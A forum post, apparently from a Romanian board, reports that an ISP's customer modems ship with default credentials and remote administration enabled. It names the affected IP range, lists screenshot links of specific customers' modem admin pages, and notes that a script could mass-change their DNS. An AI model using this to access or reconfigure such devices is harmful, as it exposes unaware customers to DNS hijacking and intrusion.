17. Hi, just as an idea, I came across a so-called vulnerability of Clicknet users which hypothetically would allow changing the DNS of every user, with all the implications. The problem is not really a security one but rather poor customer information, and it goes like this: every Clicknet customer receives an installation kit containing a modem, cables and an installation manual. All well and good, except... the modems with UTP/wireless ports (except the USB ones) ship from the factory with a standard user and password and with a major security hole: remote administration access. The installation manual (which was written by monkeys) not only fails to explain the installation steps correctly, it presents nonsense, but nowhere does it say "Hey dummy, change the router password or disable remote access", so anyone who accesses an IP of the form 89.120.xxx.xxx that is online has access to all the settings of the ADSL modem, including changing the DNS. How nice it would look for the Turkish-run company when all of a sudden all their customers, when accessing www.google.com, are redirected to www.adultfriendfinder.com or God knows what other dodgy destination. After all, it's within anyone's reach to write a script that accesses and modifies all the modems. Worse still, the users don't have the slightest idea of the danger they are exposed to; I found out about this with astonishment after I set up a test p2p server and, when I accessed the IP, SURPRISE!!! Worse still, many state institutions get their internet from Clicknet... imagine the fun and the lawsuits on the heads of those at Romtelefon (personally I'm sure the people at the Arad local council cursed a lot a few days ago). That's about it... oh yes, and some pictures, because otherwise it's not possible:
http://www.testeweb.com/rst/romtelefon/89.120.221.111.jpg
http://www.testeweb.com/rst/romtelefon/89.120.221.140.jpg
http://www.testeweb.com/rst/romtelefon/89.120.221.19.jpg
http://www.testeweb.com/rst/romtelefon/89.120.221.3.jpg
http://www.testeweb.com/rst/romtelefon/89.120.221.40.jpg
http://www.testeweb.com/rst/romtelefon/89.120.221.49.jpg
Out of 200 IPs tested, ONLY 12 had the password changed. In the meantime I have uploaded some more pictures plus a few "surprises" for whoever is curious: http://www.testeweb.com/rst/romtelefon/